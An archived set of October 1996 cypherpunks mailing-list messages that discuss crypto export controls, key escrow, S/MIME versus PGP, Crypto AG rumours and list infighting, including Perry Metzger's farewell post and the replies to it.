In-Reply-To: <v03007803ae8213598ea6@[207.167.93.63]>
Message-ID: <Pine.3.89.9610100151.A6104-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 9 Oct 1996, Timothy C. May wrote:

> At 1:43 PM -0500 10/9/96, Paul Robichaux wrote:
> 
> >When you buy Que's current Netscape book (_Special Edition, Using Netscape
> >3_), the included CD has the US-only, 128-bit, non-export version of
> >Navigator on it. It's a licensed copy, even! (Of course, the book also has
> >a small yellow "NOT FOR EXPORT" tag on the back cover, but who's counting?)
> >
> >For $49, getting a licensed copy of the 128-bit Navigator 3.0 plus a 1000+
> >page book is a pretty good deal. My hat's off to Netscape for choosing to
> >put the 128-bit version on the CD, and to Macmillan/Que for bothering to
> >get the software in the first place. I really do believe that Netscape
> >wants to get secure software out as widely as possible.
Egghead has 128 bit Navigator 3.0 on sale for $29. You heard me right. The 
clerk at Egghead, speaking broken English, failed to ask me for my passport.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 10 Oct 1996 00:01:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Swan song...
Message-ID: <199610100701.DAA13077@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, folks, after four or five years here, I'm finally leaving.

I've picked this moment for two reasons.

First, the signal to noise ratio here is now too low to be measured
without expensive lab equipment -- as bad as Usenet, or even worse.

Second, I now have two candidate sites to host a new
cryptography & cryptography politics mailing list to replace this one.

The new list will be run very tightly. Some people will doubtless
label me a fascist and say I'm impinging on their ability to be
"free". Those that feel that the best use of their freedom is to
urinate into their own drinking water are entitled to their beliefs --
but they will not be welcome on the new list.*

It is time to get back to cryptography.

You all remember cryptography, don't you? Its the "cipher" in CYPHERpunk.

Years ago, on cypherpunks, Phil Karn noted, after Stuart Baker of NSA
named his nightmare vision of strong crypto embedded in every $20
phone and every fax machine, "Gentlemen, I believe we have our design
specification." One cannot imagine that sort of thing being said here
now.

Four years ago, PGP 2.0 was released, and the first shot was sent
across the bow of those that would stop us. It is more than time to
fire off another round or two.

Cypherpunks file lawsuits!
Cypherpunks develop protocols!
Cypherpunks write RFCs!
Cypherpunks start companies!
Cypherpunks WRITE CODE, damn it!
Cypherpunks don't wait for the administration to move -- they move
  first! They move FASTER!
Cypherpunks don't wait for someone else to deploy cryptography -- they
  deploy it themselves!
Cypherpunks do not sit on their asses and pull their puds while
  discussing warmed over theories about personal freedom.
Cypherpunks BUILD THE TOOLS TO IMPLEMENT THE THEORY!
Cypherpunks don't fantasize, they create!

In short, CYPHERPUNKS DO! They don't live for blather.

Cypherpunks Mark I used to be a glorious place.
Son of Cypherpunks may fail, but we must make the attempt to create it.

In short,
Cypherpunks is dead,
Long live Cypherpunks!

I will post pointers to the new list within ten days -- on or before
October 20, 1996.


Perry

* Those that feel that peeing into their own drinking water is a good
idea are directed to 
  http://www.envirolink.org/orgs/coe/snuffit2/living_water.jpg
and
  http://www.envirolink.org/orgs/coe/snuffit2/lifewater.html
where you will find others who agree with you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 10 Oct 1996 03:16:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netscape does the right thing
In-Reply-To: <v03007803ae8213598ea6@[207.167.93.63]>
Message-ID: <325CCC3A.7D6F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> On Wed, 9 Oct 1996, Timothy C. May wrote:
> 
> > At 1:43 PM -0500 10/9/96, Paul Robichaux wrote:
> >
> > >When you buy Que's current Netscape book (_Special Edition, Using Netscape
> > >3_), the included CD has the US-only, 128-bit, non-export version of
> > >Navigator on it. It's a licensed copy, even! (Of course, the book also has
> > >a small yellow "NOT FOR EXPORT" tag on the back cover, but who's counting?)
> > >
> > >For $49, getting a licensed copy of the 128-bit Navigator 3.0 plus a 1000+
> > >page book is a pretty good deal. My hat's off to Netscape for choosing to
> > >put the 128-bit version on the CD, and to Macmillan/Que for bothering to
> > >get the software in the first place. I really do believe that Netscape
> > >wants to get secure software out as widely as possible.
> Egghead has 128 bit Navigator 3.0 on sale for $29. You heard me right. The
> clerk at Egghead, speaking broken English, failed to ask me for my passport.

  The version of Navigator sold in retail stores in the US has been
the strong 128-bit version for a year now.  The first production run
was the export version (even though the box said "not for export")
because the marketing people didn't think it mattered.  Once I 
educated them, the right thing happened.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 10 Oct 1996 00:42:09 -0700 (PDT)
To: pclow <pclow@pc.jaring.my>
Subject: Re: Crypto AG - Secret GAK Partner ?
In-Reply-To: <325CDEE2.86A@pc.jaring.my>
Message-ID: <Pine.SUN.3.94.961010033710.19838B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, pclow wrote:

> Hi fellow flamers, cuss'ers, ect..
> 
> Some one recently gave me a copy of an article in Der Spiegel
> (unfortunately in german!) stating that Crypto AG of Switzerland
> had passed the keys to the German Govt without informing the
> customer.
> 
> Can someone confirm, elaborate, dispute...... please.... :)

I can confirm the rumors, that is that the rumors are circulating.
I saw the Spiegel article.  I believe it.
Crypto AG is known for its government (ahem) sympathies.

Stay away from Switzerland.  All sorts of nasties in there.

> 
> Thanks.
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Thu, 10 Oct 1996 04:40:55 -0700 (PDT)
To: stewarts@ix.netcom.com
Subject: Re: Recent Web site cracks [CIA & DOJ sites]
In-Reply-To: <Pine.BSD.3.92.961010062101.7581A-100000@miso.wwa.com>
Message-ID: <Pine.SUN.3.94.961010043006.15037A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov asked after stewarts@ix.netcom.com wrote:

>> The DOJ and CIA sites were actually cracked; don't know the mechanisms.
>> The dole-kemp96.com and dole-kemp96.org domains were spoofs - they
>> have similar names to the real site, and people reach them by accident
>> or by hearing about them.  According to today's San Jose Mercury News,
>> the web designer who registered them did so just before Dole announced
>> Kemp as his VP, and tried to sell his design services to the campaign.
>> They didn't buy it, and the names were sitting around with nothing
>> better to do anyway, so he decided to have a good time with them.
>> Supposedly he's gotten about 40,000 hits and the "real" 
>> site got 1,000,000. 
> 
> Anyone got a copy of the cracked CIA page?

Try: http://www.dis.org/se7en/hacktrash/index.html

Both the CIA and the DOJ sites are mirrored there.

Cheers!

William Knowles
erehwon@c2.net


--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote Harry Browne for President -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 10 Oct 1996 01:48:29 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: "European Union Bank"
In-Reply-To: <3.0b19.32.19961009220915.00fdf69c@panix.com>
Message-ID: <Pine.SUN.3.94.961010044708.20565D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Duncan Frissell wrote:

> At 07:06 PM 10/8/96 +0300, Jüri Kaljundi wrote:
> >According to one offshore magazine European Union Bank is a very bad
> >choice for Internet banking. What they did was they assigned they named
> >Lord Mancroft who sits in the UK's House of Lords as chairman of the bank.
> >Only thing Lord Mancroft himself did not know a thing about it, although
> >the bank marketing materials had a letter of welcome supposedly from that
> >prominent person. So he is thinking of taking legal action against the
> >bank.
> 
> I have at hand a brochure from "Shorex 96 - The Premier Offshore
> Exhibition" to be held November 20-22 in London.  Day One features a
> section on "Offshore and the Internet"  including a panel "Will the
> Internet Increase the Market Share of the Offshore Industry?"  Featuring
> "Lord Mancroft, Chairman, European Union Bank, Antigua."
> 
> I wonder if he'll be there.  If we are both there, I'll ask him.

Is there a little "*" next to his name which resolves to "Scheduled to
Appear" ?

> 
> DCF 
> 
> "If control measures are so effective, why does everything seem to be more
> and more out of control?"
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 10 Oct 1996 05:51:59 -0700 (PDT)
To: Alex Filacchione <alexf@iss.net>
Subject: RE: "Soul Catcher" Computer Chip (fwd)
In-Reply-To: <01BBB5FC.3769FEA0@alexf.iss.net>
Message-ID: <Pine.SUN.3.91.961010055014.6351B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I recall Noah has something on this in the November issue of Wired.

-Declan


On Wed, 9 Oct 1996, Alex Filacchione wrote:

> 
> QUOTE
> 
> SOUL CATCHER IMPLANTS
> 
> British scientists are developing a concept for a computer chip
> which, when implanted into the skull behind the eye, will be able to
> record a person's every life time thought ands sensation.
> 
> =-=-=-=-=-=-
> 
> Hahaha!  That's a good one.  Maybe these guys should share some of their 
> findings w/ the worlds leading neurologists, since they seem to know so 
> much.  "Every lifetime thought"??????  Even one thought.  Hmmm, perhaps 
> they would care to explain human emotions in scientific terms, fully 
> explained, no vagueness allowed?  Care to share "translation tables" for 
> neuro-electric impulses that show signature of certain emotions?  This is 
> just so ridiculous.  I would just like to ask them one question.  "How?" 
>  Record what someone sees?  Maybe....
> 
> Alex F
> alexf@iss.net
> 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 10 Oct 1996 05:54:52 -0700 (PDT)
To: "Mark M." <markm@voicenet.com>
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <Pine.LNX.3.95.961009171647.683B-100000@gak.voicenet.com>
Message-ID: <Pine.SUN.3.91.961010055215.6351C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


A month or two ago, I searched through the existing DT statute and posted 
language that could be interpreted as applying to ISPs. If there's an ISP
exemption I missed, please post...

-Declan


On Wed, 9 Oct 1996, Mark M. wrote:

> On Wed, 9 Oct 1996, Timothy C. May wrote:
> 
> > Back to the legal issue. Perhaps the Digital Telephony Act will be
> > interpreted to require ISPs to make their systems "tappable," possibly by
> > adding message logging. possibly just by offering access to the T1s and T3s
> > only ("OK, Feds, here's where the T3 enters the building...be careful you
> > don't cut the core, OK?").
> 
> I think there is a section of DT that explicitly excludes ISP's.
> Of course, this can, and probably will be, changed.
> 
> Mark
> --
> finger -l for key
> PGP encrypted mail prefered.
> 
> Good signature from user "Mark Miller 2048-bit key <markm@voicenet.com>".
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Thu, 10 Oct 1996 07:46:12 -0700 (PDT)
To: Cypherpunks          <cypherpunks@toad.com>
Subject: "Cure" for Crypto Anarchy?
Message-ID: <PJ6kVD4w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


INTERNET SUPPRESSION IN BURMA
In an attack on the country's political dissidents, the military regime in
Burma has outlawed the unauthorized possession of a computer with networking
capability, and prison terms of 7 to 15 years in prison may be imposed on
those who evade the law or who are found guilty of using a computer to send
or receive information on such topics as state security, the economy and
national culture.  (Financial Times 5 Oct 96)

************************************************************
Edupage ... is what you've just finished reading.  To subscribe to Edupage:
send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
Charles Philipon  (if your name is Charles Philipon;  otherwise, substitute
your own name).  ...

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Oct 1996 07:09:17 -0700 (PDT)
To: Cypherpunks <cypherpunks@toad.com>
Subject: LET'S MEET DIMITRI
Message-ID: <Pine.SUN.3.91.961010064043.5943A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Bay Area Cypherpunks,

I am hereby pledging US$100 towards a fund to fly Dimitri to the
SF Bay area for a Cypherpunk meeting.  I certainly would like to
meet a real cryptographer, and I'm sure many of you would too.
We should throw in a hotel room and local transportation as well.  
I want Dimitri to be our featured speaker--his choice of topic, 
of course.

I am ABSOLUTELY serious in this offer, but I will need donations
from other Cypherpunks.  If I get sufficient pledges to cover 
Dimitri's travel expenses, I will coordinate with Dimitri and
make the necessary travel and hotel arrangements.

Dimitri, what say you?  Are you willing in flying to California 
to address the Mother of All Cypherpunk Meetings?  I hope so.
I'm sure it would be one of our most highly attended meetings.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 10 Oct 1996 07:07:42 -0700 (PDT)
To: perry@piermont.com
Subject: Re: Swan song...
In-Reply-To: <199610100701.DAA13077@jekyll.piermont.com>
Message-ID: <325D0249.1E36@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> Well, folks, after four or five years here, I'm finally leaving.

[pathetic whining snipped]

> The new list will be run very tightly. Some people will doubtless
> label me a fascist and say I'm impinging on their ability to be
> "free". Those that feel that the best use of their freedom is to
> urinate into their own drinking water are entitled to their beliefs --
> but they will not be welcome on the new list.*

[more whining snipped]

Nothing in the real world is perfect, ideal, or even relatively close to 
either one.  If you want to really solve your problems, it will not 
likely be in running away, but in getting some therapy (seriously).

As far as Fascist goes, fascism is fun enough when everyone gets to 
participate, but I get the idea you feel "some of the pigs are more 
equal than others", if you know what I mean, and I think you do.

I haven't been on the list more than 6-8 weeks, but in that time, it's 
been more interesting than I would have guessed for a non-technical 
forum, which isn't necessarily good, but this is the real world.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 10 Oct 1996 06:58:02 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GA
Message-ID: <199610101357.GAA04414@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 10 Oct 96 at 8:16, Dr.Dimitri Vulis KOTM wrote:

> Lucky Green <shamrock@netcom.com> writes:
> 
> > Would you folks *please* cut this thread? It has gone on long enough. Too
> > long, in fact.
> 
> Yes. Timmy May started it, but flaming the mormons.

No.  But I am Fucking sick of reading about this LDS shit.  Iheard 
enough as a kid raised in the church.  KILL THIS THREAD


> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 
> 

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Thu, 10 Oct 1996 05:42:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: FCPUNX:ABA Likes GAK
In-Reply-To: <199610100438.AAA26902@beast.brainlink.com>
Message-ID: <961010.070652.0x5.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

jya@pipeline.com forwards:

>     10-03-96 at 19:09 EDT, American Banker 
>  
>  
>    Banks Like Export Plan for High-Power Encryption  
>  
>    By Drew Clark 

[snippo]

>    Banks were heartened by the announcement because many 
>    view the widely used Data Encryption Standard - a 
>    low-level form of data scrambling - as inadequate 
>    protection against the rising computer power of so-called 
>    hackers. 
>  
>    Though banks can use a complex 56-bit data encryption key 
>    for financial transactions, sensitive communications with 
>    overseas branches are limited to a less powerful 40-bit 
>    standard. 

Wow... in two successive paragraphs, DES is first called inadequate and
then lauded as "complex [...] encryption" (as though it were the weapon
of choice).

Who's clue-impaired here?  Clark or the ABA (or both)?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlznpRvikii9febJAQGu9gP/R6MAE4SbJTyiXFjXGBRIrQTNnn9KDO0P
+K1GpRd2dLRjnPnsZekYokSailm2ga7Q/UPwIs8PXHbtTUFYL2nlwzcxfMG4gE6m
PWCfLWBhbQ3p22F8M9OlivbR7a+sLzo0ZwItDUa5vAJv5kMFhuHegNvtYE2Qnpr2
H9SW6Vc07UE=
=rJ99
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Thu, 10 Oct 1996 05:43:54 -0700 (PDT)
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <199610081955.UAA00221@server.test.net>
Message-ID: <961010.071747.6d6.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, aba@dcs.ex.ac.uk writes:

> Dimitri Vulis <dlv@bwalk.dm.com> writes:
>> [...]
>> Another possibility is to issue a charge card (payable in full at
>> the end of the month, getting revenue from the annual fee), rather
>> than a credit card, so it could claim not to be subject to certain
>> Federal Reserve's regulations that have to do with credit card
>> disputes. But then it probably can't be Visa/MC and can't use their
>> clearginhouses.
>
> I have a VISA card which is purely a debit card.  It is accepted all
> the places any standard VISA card would be.  (UK, Lloyds bank).

I have one of those, too.  A couple of months ago, Thrifty car rental
refused to accept it to rent a car.  (the agent was pretty snotty about
it, too)  Beginning of a trend?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlzp0xvikii9febJAQFatAP9EUJ8i0xqt7G03C8nDreZ+YcO04a9x/xI
R/ZzX+xQSo1Oe6xbB5IvyEeLuoO2SsXrHroLNE7AekgqQnyK9JprxcykUlxkKSEq
IVL+QHbR2Y8nvO8qINp3G7ToU6HfsISOJtFl8mVtcy2eukMgqErVcIhqOYbafsf+
CZfMIKaJsM8=
=6AQd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 06:00:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <Pine.3.89.9610100115.A6104-0100000@netcom6>
Message-ID: <801kVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.com> writes:

> Would you folks *please* cut this thread? It has gone on long enough. Too
> long, in fact.

Yes. Timmy May started it, but flaming the mormons.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 10 Oct 1996 08:26:45 -0700 (PDT)
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: pgp, edi, s/mime
Message-ID: <v02130501ae825f741356@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>S/MIME has come a _long_ way. An earlier version (now called S/MIME 1.0,
>although I'm not sure this is going to make it into any marketing
>materials) had a couple of cryptographic problems compared with PGP.
>Those problems have been fixed in version 2.0, which is expected shortly
>(as an internet draft).
>
>S/MIME 2.0 _defaults_ to 168-bit triple-DES, unless you're stupid enough
>to use the export version. RSA key sizes up to 2048 bits are supported,
>as are a number of alternate symmetric algorithms. In addition, digital
>signatures are based on 160-biy SHA1, rather than 128-bit MD5, which is
>half broken anyway.
>
>In the meantime, Deming software is shipping a slick Windows
>implementation of S/MIME, which integrates nicely with Eudora. Netscape
>is expected to ship cross-platform S/MIME capability in version 4.0 of
>Navigator (their original publicity materials were only off by a factor
>of two ;-), and that will make a huge dent in the market.
>
>In sum, S/MIME leaves PGP in the dust, both techically and as a market
>force. There's still a lot of sentiment that PGP is one of "ours" and
>S/MIME is one of theirs, but at this point it's the latter that has the
>most promise of bringing encrypted e-mail to the masses.
>
>If only X.509 weren't so darned ugly :-)
>
>Raph

How will users be made confident that the S/MIME crypto isn't somehow
compromised in these products?  Vendor trust (I think not, with all the
government pressures)?




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 10 Oct 1996 07:10:35 -0700 (PDT)
To: stewarts@ix.netcom.com
Subject: Re: PGP implements Key Recovery today!
In-Reply-To: <199610081636.MAA10922@attrh1.attrh.att.com>
Message-ID: <199610100740.IAA00270@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart <stewarts@ix.netcom.com> writes:
> PGP has provided a key recovery option for several years.  You can
> either use the EncryptToSelf option, or use multiple recipients,

For a press worthy hack, it would be fun to extract an NSA RSA public
key from some GAKked software, and format it as a PGP key.

Then people can use key escrow if they wish (second recipient NSA).
And they can feed the NSA misinformation, stegoed data, double
encrypted PGP messages, anti GAK flames, and they might even feel
obliged to decrypt, and read it all :-)

I read some time ago about Lotus Notes which uses RSA and has GAK, was
this press release fodder, or does the product currently exist in it's
GAKked form?  Are the other GAKked products?

Is there anyone with a GAKked product, and the patience to reverse
engineer for the GAK key?

I guess if you do get an RSA key for the NSA, then you can choose an
email for them to put on the PGP keyid:

	NSA <dirnsa@nsa.gov>

(a real working email address would be better, if that one isn't
good), and get it signed by a timestamping service (persuade the owner
to sign in the form of a key certification).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 10 Oct 1996 08:33:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netscape does the right thing (fwd)
In-Reply-To: <199610101332.JAA13826@wauug.erols.com>
Message-ID: <v03007802ae82d64e2c22@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:32 AM -0400 10/10/96, David Lesher / hated by RBOC's in 5 states wrote:
>Lucky Green sez:
>> Egghead has 128 bit Navigator 3.0 on sale for $29. You heard me right. The
>> clerk at Egghead, speaking broken English, failed to ask me for my passport.
>
>Good Point. If Peter Junger is supposed to maintain a chain of
>custody in his class; must not the bookstores, ComputerLands, you
>name it, ALSO do the same -- restricting not just customers, but
>non-AmCit employees' access...?

"No dogs and foreigners allowed"?

If the ITAR/Bernstein/Junger set of cases gets interpreted in a certain way
(exposure of non-U.S. persons to "U.S. strategic information" is a felony),
then Barnes and Noble and Supercrown may have to post signs forbidding
foreigners from entering certain areas, or the entire store, or checking
official papers before the computer science section may be entered.

("Pappieren, bitte?")

As Cindy Cohn pointed out at the Bernstein hearing, the Junger case may
raise some substantial "Title 14" (I think it is) issues. If a university
or bookstore  excludes foreign-looking persons, other laws say this is
discrimination. And yet the ITARs may make it a crime to let a damned
furriner into a public library that has a copy of--gasp--"Applied
Cryptography."

Realistically, no one has been prosecuted for such a thing. But the ITARs
are worded in such a way that prosecution _could_ happen. Hence the
Bernstein and Junger cases.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 06:00:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Swan song...
In-Reply-To: <199610100701.DAA13077@jekyll.piermont.com>
Message-ID: <RT3kVD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Well, folks, after four or five years here, I'm finally leaving.

I'm very sorry to hear that. Another person who actually knows crypto and
is willing to share his knowledge has been driven off this list by Timmy-
generated noise and flame wars. What a shame.

> I will post pointers to the new list within ten days -- on or before
> October 20, 1996.

I'm looking forward to it. Would you be interested in my "wire clippings"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Thu, 10 Oct 1996 00:48:41 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: AW: Binding cryptography - a fraud!
Message-ID: <01BBB68A.970D6480@port12.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>>The idea is that any third party, e.g., a network or service provider,
>>who has access to components 2, 3 and 4 (but not to any additional
>>secret information) can:
>>a. check whether the session keys in components 2 and 3 coincide;
>>b. not determine any information on the actual session key.
>>
>>In this way, fraud is easily detectible: a sender that attempts to
>>virtually address a session key to the TRP (component 3) that is
>>different from the real one he uses on the message (or just nonsense)
>>will be discovered by anyone checking the binding data. If such
>>checking happens regularly, fraud can be properly discouraged and
>>punished.

>
>I am at the same time dismayed and disgusted at the tendency of some 
people
>to want to "detect fraud" on the part of ordinary citizens, as this paper
>appears to want to do, but says _nothing_ about preventing fraud
>_by_government.  How is the average citizen to know if keys are being 
given
>out to government agents for valid reasons?

First of all, that (and the legitimacy of "wiretaps" in general) is 
something that should
be regulated in national law (including procedures, checks and balances, 
penalities). Maybe
you have the opinion that that is impossible to achieve, [or at least that 
making wiretapping
as such by government impossible is the only satisfactory way of doing it 
(-; ]. Our concept
assumes that it is possible and acceptable, although legislation (and 
especially appliance of
it) in some countries might be improved..

Second, the concept is flexible in the choice of Trusted Retrieval Parties; 
we have the opinion
that if you don't trust the existing TRPs then, hey, setup your own TRP. We 
believe that should be possible (and forsee serveral "privacy-protecting" 
organisations doing so). However, as you don't
want to have criminals setting up TRPs, some legislation on this point 
should be made...

Finally, as said in the announcement:
"In [VKT], we explain how we envision the framework in which the binding
concept could present a security tool in the information society."


>
>I am further enraged by the last portion of the paragraph above where he
>says, "fraud can be properly discouraged _and_punished_"  Why "punished"? 
>Why call it "fraud"?  Why should sending the "wrong" bits become a crime? 
>The US government, for example, has repeatedly claimed that key-escrow
>systems should be "voluntary."  Presumably, except for authoritarian and
>totalitarian countries, no other country should force their own citizens 
or
>others to use any sort of key-escrow/GAK system.

Wait a minute. It is a *voluntary* system, but it has some rules that 
apply. The whole
idea here is: if you don't like it, use your own system. "Fraude" refers to 
using the
system without sticking to its rules, maybe fraude has a wrong connotation.

>
>Maybe I'm biased:  I'm a libertarian who believes that sending the wrong
>bits shouldn't be considered a crime.  The problem we have is with the
Depends, it might be childrens pornography. The information society is 
*not* about
bits, but about information.

>politicians, NOT primarily the criminals.  Giving the government the 
ability
>to punish people merely for sending the wrong bits (absent some other, 
REAL
>crime) is an enormous step backward.  And if they're guilty of a real 
crime,
>why bother about the bits?
In a democratic country one needs evidence to convict someone.

>
>Even if I believed in GAK, which I don't, I don't think governments or
>anyone else should be able to determine whether the "correct" code is
>included with the data until and unless the government has a valid 
warrant,
Code is checked (on protocol compliance) by third parties all the time. 
They
should not get any wiser from it, that is the point.


>
>
>Jim Bell
>jimbell@pacifier.com
